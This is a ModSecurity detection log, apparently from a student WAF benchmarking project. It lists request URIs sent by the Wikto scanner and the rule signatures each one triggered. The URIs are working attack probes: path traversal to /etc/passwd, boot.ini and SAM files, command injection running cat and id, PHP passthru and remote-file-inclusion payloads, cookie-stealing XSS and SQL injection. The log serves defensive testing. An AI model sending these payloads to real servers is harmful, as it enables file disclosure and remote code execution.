# ms-inspectorlog v3.5
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/dit/Downloads/inspectorlog/ms-inspectorlog -l wikto.uri -t list -r /home/dit/Downloads/inspectorlog/etc/basic_rules.conf -o /home/dit/TFG/inspectorlog/modsecurity/web_estatica/security_tools_benchmarking/wikto/wikto.clean
Packet [34]	Uri [/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [35]	Uri [/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [51]	Uri [/.DS_Store]	Nattacks [1 ]	Signatures	[930130]
Packet [52]	Uri [/.DS_Store]	Nattacks [1 ]	Signatures	[930130]
Packet [69]	Uri [/content/base/build/explorer/none.php?/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [76]	Uri [/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [77]	Uri [/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [164]	Uri [/oem_webstage/oem.conf]	Nattacks [1 ]	Signatures	[920440]
Packet [165]	Uri [/oem_webstage/oem.conf]	Nattacks [1 ]	Signatures	[920440]
Packet [166]	Uri [/php/php.exe?c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [214]	Uri [/boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [227]	Uri [../../../../../../../../../../etc/*]	Nattacks [3 ]	Signatures	[920100]	[930100]	[930110]
Packet [228]	Uri [../../../../../../../../../../etc/passw*]	Nattacks [3 ]	Signatures	[920100]	[930100]	[930110]
Packet [229]	Uri [../../../../../../../../../../etc/passw*]	Nattacks [3 ]	Signatures	[920100]	[930100]	[930110]
Packet [230]	Uri [@NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920100]	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [231]	Uri [@NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920100]	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [232]	Uri [@NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [8 ]	Signatures	[920100]	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [233]	Uri [@NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [8 ]	Signatures	[920100]	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [236]	Uri [@NUKEviewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920100]	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [237]	Uri [@NUKEviewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [8 ]	Signatures	[920100]	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [250]	Uri [/?pattern=/etc/*&sort=name]	Nattacks [2 ]	Signatures	[932190]	[942440]
Packet [254]	Uri [/.../.../.../.../.../.../.../.../.../boot.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [255]	Uri [/../../../../../../../../../../etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [256]	Uri [/../config.dat]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [257]	Uri [/../webserver.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [258]	Uri [//..\SensePostNotThereNoNolass]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [259]	Uri [/..\..\..\..\..\..\temp\temp.class]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [260]	Uri [/..%252f..%252f..%252f..%252f..%252f../windows/repair/samSensePostNotThereNoNosam]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [261]	Uri [/..%252f..%252f..%252f..%252f..%252f../windows/repair/sam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [262]	Uri [/..%252f..%252f..%252f..%252f..%252f../winnt/repair/samSensePostNotThereNoNoam._]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [263]	Uri [/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [264]	Uri [/..%252f..%252f..%252f..%252f..%252f../winnt/repair/samSensePostNotThereNoNosam]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [265]	Uri [/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [266]	Uri [/..%255c..%255c..%255c..%255c..%255c../windows/repair/samSensePostNotThereNoNosam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [267]	Uri [/..%255c..%255c..%255c..%255c..%255c../windows/repair/sam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [268]	Uri [/..%255c..%255c..%255c..%255c..%255c../winnt/repair/samSensePostNotThereNoNoam._]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [269]	Uri [/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [270]	Uri [/..%255c..%255c..%255c..%255c..%255c../winnt/repair/samSensePostNotThereNoNosam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [271]	Uri [/..%255c..%255c..%255c..%255c..%255c../winnt/repair/samSensePostNotThereNoNosam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [272]	Uri [/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [273]	Uri [/..%2F..%2F..%2F..%2F..%2F../windows/repair/samSensePostNotThereNoNosam]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [274]	Uri [/..%2F..%2F..%2F..%2F..%2F../windows/repair/samSensePostNotThereNoNosam]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [275]	Uri [/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [276]	Uri [/..%2F..%2F..%2F..%2F..%2F../winnt/repair/samSensePostNotThereNoNoam._]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [277]	Uri [/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [278]	Uri [/..%2F..%2F..%2F..%2F..%2F../winnt/repair/samSensePostNotThereNoNosam]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [279]	Uri [/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [281]	Uri [/.%252e/.%252e/.%252e/winnt/boot.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [284]	Uri [//.adSensePostNotThereNoNobook]	Nattacks [1 ]	Signatures	[913120]
Packet [288]	Uri [/.bash_history]	Nattacks [1 ]	Signatures	[930130]
Packet [290]	Uri [/.bashrc]	Nattacks [1 ]	Signatures	[930130]
Packet [291]	Uri [/.cobalt/sysManage/../admin/.htaccess]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[930130]
Packet [297]	Uri [/.htaccess]	Nattacks [1 ]	Signatures	[930130]
Packet [300]	Uri [/.htpasswd]	Nattacks [1 ]	Signatures	[930130]
Packet [305]	Uri [/.mysql_history]	Nattacks [1 ]	Signatures	[930130]
Packet [319]	Uri [/.profile]	Nattacks [1 ]	Signatures	[930130]
Packet [323]	Uri [/.sh_history]	Nattacks [1 ]	Signatures	[930130]
Packet [327]	Uri [/.ssh/authorized_keys]	Nattacks [1 ]	Signatures	[930130]
Packet [329]	Uri [/.ssh/known_hosts]	Nattacks [1 ]	Signatures	[930130]
Packet [334]	Uri [/[SecCheck]/..%252f..%252f../extSensePostNotThereNoNo.ini]	Nattacks [4 ]	Signatures	[920440]	[930100]	[930110]	[930110]
Packet [335]	Uri [/[SecCheck]/..%252f..%252f../ext.ini]	Nattacks [4 ]	Signatures	[920440]	[930100]	[930110]	[930110]
Packet [336]	Uri [/[SecCheck]/..%255c..%255c../extSensePostNotThereNoNo.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [337]	Uri [/[SecCheck]/..%255c..%255c../ext.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [338]	Uri [/[SecCheck]/..%2f../extSensePostNotThereNoNo.ini]	Nattacks [4 ]	Signatures	[920440]	[930100]	[930110]	[930110]
Packet [339]	Uri [/[SecCheck]/..%2f../ext.ini]	Nattacks [4 ]	Signatures	[920440]	[930100]	[930110]	[930110]
Packet [340]	Uri [////./../.../boot.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [341]	Uri [////./../.../boot.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [349]	Uri [/%00]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [350]	Uri [/%00/]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [351]	Uri [/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [352]	Uri [/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [365]	Uri [/acart2_0/acaSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [366]	Uri [/acart2_0/acart2_0.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [371]	Uri [/achievo//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/]	Nattacks [1 ]	Signatures	[931130]
Packet [372]	Uri [/active.log]	Nattacks [1 ]	Signatures	[920440]
Packet [373]	Uri [/active.log]	Nattacks [1 ]	Signatures	[920440]
Packet [376]	Uri [/Admin_files/ordSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [377]	Uri [/Admin_files/order.log]	Nattacks [1 ]	Signatures	[920440]
Packet [394]	Uri [/admin/cplSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [395]	Uri [/admin/cplogfile.log]	Nattacks [1 ]	Signatures	[920440]
Packet [396]	Uri [/admin/database/wwFSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [397]	Uri [/admin/database/wwForum.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [400]	Uri [/admin/exec.php3?cmd=cat%20/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [409]	Uri [/admin/system.php3?cmd=cat%20/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [410]	Uri [/admin/system.php3?cmd=cat%20/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [420]	Uri [/albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [421]	Uri [/albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [426]	Uri [/ans.pl?p=../../../../../usr/bin/id|&blah]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[932160]	[942460]
Packet [427]	Uri [/ans/ans.pl?p=../../../../../usr/bin/id|&blah]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[932160]	[942460]
Packet [428]	Uri [/ans/ans.pl?p=../../../../../usr/bin/id|&blah]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[932160]	[942460]
Packet [434]	Uri [/ASP/cart/database/metSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [435]	Uri [/ASP/cart/database/metacart.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [436]	Uri [/athenareg.php?pass=%20;cat%20/etc/passwd]	Nattacks [4 ]	Signatures	[930120]	[932100]	[932160]	[942110]
Packet [437]	Uri [/atomicboard/index.php?location=../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [440]	Uri [/autohtml.php?op=modload&mainfile=x&name=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [450]	Uri [//banSensePostNotThereNoNo.bak]	Nattacks [1 ]	Signatures	[920440]
Packet [451]	Uri [/ban.bak]	Nattacks [1 ]	Signatures	[920440]
Packet [452]	Uri [//banSensePostNotThereNoNo.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [453]	Uri [/ban.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [454]	Uri [//banSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [455]	Uri [/ban.log]	Nattacks [1 ]	Signatures	[920440]
Packet [456]	Uri [//banSensePostNotThereNoNo.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [457]	Uri [/banmat.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [458]	Uri [/banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'/*]	Nattacks [5 ]	Signatures	[920220]	[920272]	[942260]	[942440]	[942460]
Packet [459]	Uri [/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [460]	Uri [/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [486]	Uri [/bytehoard/index.php?infolder=../../../../../../../../../../../etc/]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [490]	Uri [/ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [491]	Uri [/ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [492]	Uri [/ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini]	Nattacks [4 ]	Signatures	[920440]	[930100]	[930110]	[930110]
Packet [496]	Uri [/catalog/includes/include_once.php]	Nattacks [1 ]	Signatures	[933150]
Packet [498]	Uri [/catinfo?<u><b>TESTING]	Nattacks [2 ]	Signatures	[941320]	[942130]
Packet [519]	Uri [/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [520]	Uri [/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [525]	Uri [/cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [526]	Uri [/cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [540]	Uri [/cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E]	Nattacks [9 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942370]	[942431]	[942460]	[942511]
Packet [556]	Uri [/cgi-bin/handler/netsonar;cat	/etc/passwd|?data=Download]	Nattacks [1 ]	Signatures	[920272]
Packet [568]	Uri [/cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [624]	Uri [//conSensePostNotThereNoNo.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [625]	Uri [/config.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [639]	Uri [//cplSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [640]	Uri [/cplogfile.log]	Nattacks [1 ]	Signatures	[920440]
Packet [641]	Uri [/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [642]	Uri [/current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [643]	Uri [/current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [649]	Uri [//datSensePostNotThereNoNo.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [650]	Uri [/data.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [651]	Uri [/data.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [659]	Uri [/database/metSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [660]	Uri [/database/metacart.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [663]	Uri [/databse.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [664]	Uri [/databse.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [665]	Uri [//db.SensePostNotThereNoNo.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [666]	Uri [/db.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [667]	Uri [/db.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [668]	Uri [/db/useSensePostNotThereNoNo.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [669]	Uri [/db/users.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [675]	Uri [/dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [676]	Uri [/dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [681]	Uri [/default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E]	Nattacks [8 ]	Signatures	[941100]	[941110]	[941160]	[941180]	[941320]	[942130]	[942431]	[942460]
Packet [682]	Uri [/default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E]	Nattacks [8 ]	Signatures	[941100]	[941110]	[941160]	[941180]	[941320]	[942130]	[942431]	[942460]
Packet [685]	Uri [/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [686]	Uri [/directory.php?dir=%3Bcat%20/etc/passwd]	Nattacks [4 ]	Signatures	[930120]	[932100]	[932160]	[942110]
Packet [692]	Uri [/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [693]	Uri [/DomainFiles/*//../../../../../../../../../../etc/passwd]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [694]	Uri [/DomainFiles/*//../../../../../../../../../../etc/passwd]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [700]	Uri [/edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [701]	Uri [/errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/]	Nattacks [2 ]	Signatures	[931110]	[931130]
Packet [712]	Uri [//extSensePostNotThereNoNo.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C]	Nattacks [1 ]	Signatures	[920440]
Packet [713]	Uri [/ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C]	Nattacks [1 ]	Signatures	[920440]
Packet [715]	Uri [/ext.ini.%00.txt]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [716]	Uri [/ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [728]	Uri [/forum_members.asp?find=%22;}alert('Vulnerable');function%20x(){v%20=%22]	Nattacks [5 ]	Signatures	[932100]	[942110]	[942430]	[942431]	[942511]
Packet [729]	Uri [/forum/admin/database/wwFSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [730]	Uri [/forum/admin/database/wwForum.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [731]	Uri [/forum/admin/wwfSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [732]	Uri [/forum/admin/wwforum.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [734]	Uri [/forumdisplay.php?GLOBALS[]=1&f=2&comma=\.system('id').\]	Nattacks [3 ]	Signatures	[933160]	[942460]	[942511]
Packet [737]	Uri [/forums/indSensePostNotThereNoNo.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;]	Nattacks [1 ]	Signatures	[941180]
Packet [738]	Uri [/forums/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;]	Nattacks [1 ]	Signatures	[941180]
Packet [739]	Uri [/forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [8 ]	Signatures	[932100]	[932110]	[933161]	[942110]	[942430]	[942510]	[942431]	[942460]
Packet [740]	Uri [/forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [8 ]	Signatures	[932100]	[932110]	[933161]	[942110]	[942430]	[942510]	[942431]	[942460]
Packet [741]	Uri [/fpdb/shoSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [742]	Uri [/fpdb/shop.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [750]	Uri [//gloSensePostNotThereNoNo.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [751]	Uri [//gloSensePostNotThereNoNo.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [752]	Uri [/global.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [755]	Uri [/guestbook/SensePostNotThereNoNo?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E]	Nattacks [7 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]	[942460]
Packet [756]	Uri [/guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E]	Nattacks [7 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]	[942460]
Packet [760]	Uri [/guestbook/admin/o12SensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [761]	Uri [/guestbook/admin/o12guest.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [783]	Uri [/hostadmin/?page=']	Nattacks [2 ]	Signatures	[942110]	[942330]
Packet [784]	Uri [/hostadmin/?page=']	Nattacks [2 ]	Signatures	[942110]	[942330]
Packet [785]	Uri [/hostadmin/?page=']	Nattacks [2 ]	Signatures	[942110]	[942330]
Packet [790]	Uri [/htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22]	Nattacks [8 ]	Signatures	[932100]	[932110]	[933161]	[942110]	[942430]	[942510]	[942431]	[942460]
Packet [802]	Uri [/images/?pattern=/etc/*&sort=name]	Nattacks [2 ]	Signatures	[932190]	[942440]
Packet [803]	Uri [/images/?pattern=/etc/*&sort=name]	Nattacks [2 ]	Signatures	[932190]	[942440]
Packet [818]	Uri [/inc/sendmail.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [819]	Uri [/inc/sendmail.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [820]	Uri [/index.html.bak]	Nattacks [1 ]	Signatures	[920440]
Packet [821]	Uri [/index.html~]	Nattacks [1 ]	Signatures	[920500]
Packet [830]	Uri [/index.php?|=../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [831]	Uri [/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [832]	Uri [/index.php?download=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [836]	Uri [/index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [837]	Uri [/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [838]	Uri [/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [839]	Uri [/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [843]	Uri [/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [844]	Uri [/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [845]	Uri [/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [846]	Uri [/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [847]	Uri [/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [848]	Uri [/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [849]	Uri [/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
